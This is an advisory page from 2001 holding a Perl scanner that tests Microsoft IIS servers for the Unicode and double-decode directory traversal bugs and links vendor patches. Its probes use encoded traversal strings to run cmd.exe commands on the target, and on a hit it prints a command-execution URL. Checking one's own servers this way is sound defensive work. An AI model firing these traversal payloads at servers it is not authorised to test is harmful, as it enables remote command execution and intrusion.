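Tool Name 21/5/2001 Test Your System for the Infamous IIS Security Holes

Details
The following tool tests your system against the two new security vulnerabilities, Escaped Characters Decoding Bug and Unicode Directory Transversal Bug. If your server is found to be vulnerable, a solution URL will be provided.

Tool:
#!/usr/bin/perl
#
# iis_promisc v2.0
#
# This is a perl script to test the infamous
# Microsoft IIS holes:
#
# -*- Escaped Characters Decoding Bug
# -*- Unicode Directory Transversal Bug
#
# * Support Proxy Server
# * Over 20 tests will be made ( if found display the patch URL too :)
#
# Added to v2:
#
# -*- Executable File Parsing Bug check
# -*- Over 40 bugs tested!
#
# * REQUIRE LWP(Lib WWW for Perl) http://www.linpro.no/lwp/
# The package libwww is found in many linux distributions
#
# by inode@unsekure.com.br
# greetz to #unsekure @ irc.brasnet.org
# http://unsekure.com.br
#
# 05/2001
#
# How the check works
#   For every directory in @dir and every encoded sequence in @string the
#   script sends one GET request (12 x 4 = 48 in total) and looks for a
#   fixed marker word in the response body.  A response containing the
#   marker counts as one hole.
#
# Reading the result
#   * A clean run is not evidence that the hotfixes are installed.  Only
#     the directories listed in @dir and the fixed winnt/system32 path are
#     covered, and only over plain http:// to the host as given.  Confirm
#     the patch level on the server itself (Q293826, Q269862, Q277873).
#   * The scan stops as soon as a response lacks "IIS" in its Server
#     header.  A host whose banner has been removed or changed is therefore
#     reported as "Not running MS-IIS" or as a connection problem and is
#     not tested further.
#   * NOTE(review): the marker is part of the request URL, so a page that
#     reflects the requested URL would also match.  Treat a hit as a reason
#     to check the installed hotfixes, not as final proof.
#   * The summary always lists all three patches; it does not say which of
#     the three bugs answered.  The per-hit lines show the matching request.
#   * Each probe is an ordinary GET, so on a server that logs requests the
#     encoded sequences from @string together with "cmd.exe" should appear
#     in the request log; the same patterns are useful when reviewing logs
#     for earlier probing of an unpatched host.

use strict;
use warnings;

use LWP;

if ( !@ARGV ) {
    die "\n-*- iis_promisc -*-\nUse: $0 www.target.com\n\n";
}

# Host under test, taken verbatim from the command line and placed right
# after "http://" in every request.  (The original read it as @ARGV[0], a
# one-element slice, and also set an unused $port = 80.)
my $target = $ARGV[0];

my $ua = LWP::UserAgent->new;
## Uncomment the line below to use a proxy server
#$ua->proxy(['http'], 'http://proxy.server.com:PORT/');
$ua->timeout(60);
$ua->agent("Mozilla/5.0 (Win95)");

# Number of requests whose response contained the marker.
my $vuln_flag = 0;

# Marker word the test request asks the server to echo back.
my $marker       = "MinhaNossaSenhoraDoPerpetuoSocorro";
my $test_command = "winnt/system32/cmd.exe?/c+echo+" . $marker;

# Only used to build the URL printed on a hit; never requested by the script.
my $dir_command = "winnt/system32/cmd.exe?/c+dir";

my @dir = (
    # You can add more exec dirs here
    #"/somedir/",
    "/",    ## wwwroot
    "/scripts/",
    "/msadc/",
    "/cgi-bin/",
    "/bin/",
    "/samples/",
    "/_vti_cnf/",
    "/_vti_bin/",
    "/adsamples/",
    "/iisadmpwd/",
    "/Rpc/",
    "/PBServer/",
);

my @string = (
    "..%255c..%255c..%255c..%255c..%255c..%255c",
    "..%c0%af../..%c0%af../..%c0%af../",
    "..%e0%80%af../..%e0%80%af../..%e0%80%af../",
    "boo.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C",
);

# Prefix of each hit line.  Both variables may be unset, so fall back to an
# empty string instead of matching against undef.
my $os_hint = $ENV{'OSTYPE'} || $ENV{'TERM'} || '';
my $found   = ( $os_hint =~ /linux/ ) ? "lynx -dump" : "-*- VULN -*-";

# Cleared when conn() reports a non-IIS or failed response.  The original
# then printed an out-of-scope (empty) variable and exited at once, which
# dropped the patch summary even when earlier requests had already matched.
my $scan_complete = 1;

SCAN:
for my $vul_dir (@dir) {
    for my $vul_string (@string) {
        my $body = conn( $vul_dir . $vul_string );

        if ( !defined $body ) {
            # conn() has already printed the reason.
            $scan_complete = 0;
            last SCAN;
        }

        if ( $body =~ /\Q$marker\E/ ) {
            $vuln_flag = $vuln_flag + 1;
            print "\n$found http://" . $target . $vul_dir . $vul_string . $dir_command . "\n";
        }
    }
}

if ( $vuln_flag != 0 ) {
    print qq~

-*--*--*--*--*--*--*--*--*--*--*--*--*-
-*- Escaped Characters Decoding Bug -*-
-*- Microsoft IIS 5.0 PATCH:
-*- http://download.microsoft.com/download/win2000platform/Patch/q293826/NT5/EN-US/Q293826_W2K_SP3_x86_en.EXE
-*- Microsoft IIS 4.0 PATCH:
-*- http://download.microsoft.com/download/winntsp/Patch/q293826/NT4/EN-US/Q295534i.exe
-*--*--*--*--*--*--*--*--*--*--*--*--*-*-
-*- Unicode Directory Transversal Bug -*-
-*- Microsoft IIS 5.0 PATCH:
-*- http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
-*- Microsoft IIS 4.0 PATCH:
-*- http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
-*--*--*--*--*--*--*--*--*--*--*-*-
-*- Executable File Parsing Bug -*-
-*- Microsoft IIS 5.0 PATCH:
-*- http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE
-*- Microsoft IIS 4.0 PATCH:
-*- http://www.microsoft.com/ntserver/nts/downloads/critical/q277873

-*- $vuln_flag hole(s) found at $target! -*-

~;
}
elsif ($scan_complete) {
    # Printed only when every request was answered by IIS.  After an aborted
    # scan this line would be false assurance, so it is skipped.
    print "\n-*- $target: Not vulnerable -*-\n\n";
}

exit;

# conn($GET_STR)
#
# Sends one GET for http://<target><GET_STR><test command> through the
# shared user agent.
#
# Returns the response body when the Server header contains "IIS".
# Otherwise prints why the host is not being tested (status 404: not IIS;
# any other status: connection problem) and returns undef so the caller
# can stop the scan.
sub conn {
    my ($GET_STR) = @_;

    my $req = HTTP::Request->new( 'GET', 'http://' . $target . $GET_STR . $test_command );
    my $res = $ua->request($req);

    # The Server header can be absent, for example on an error response
    # that LWP generates locally; treat that as "not IIS" without warning.
    my $server = $res->server;
    $server = '' unless defined $server;

    if ( $server =~ /IIS/ ) {
        return $res->content;
    }

    my $err = $res->code;
    if ( $err == 404 ) {
        print "\n-*- Not running MS-IIS -*-\n";
    }
    else {
        print "\n-*- HTTP error code $err Connection problems -*-\n";
    }
    return;
}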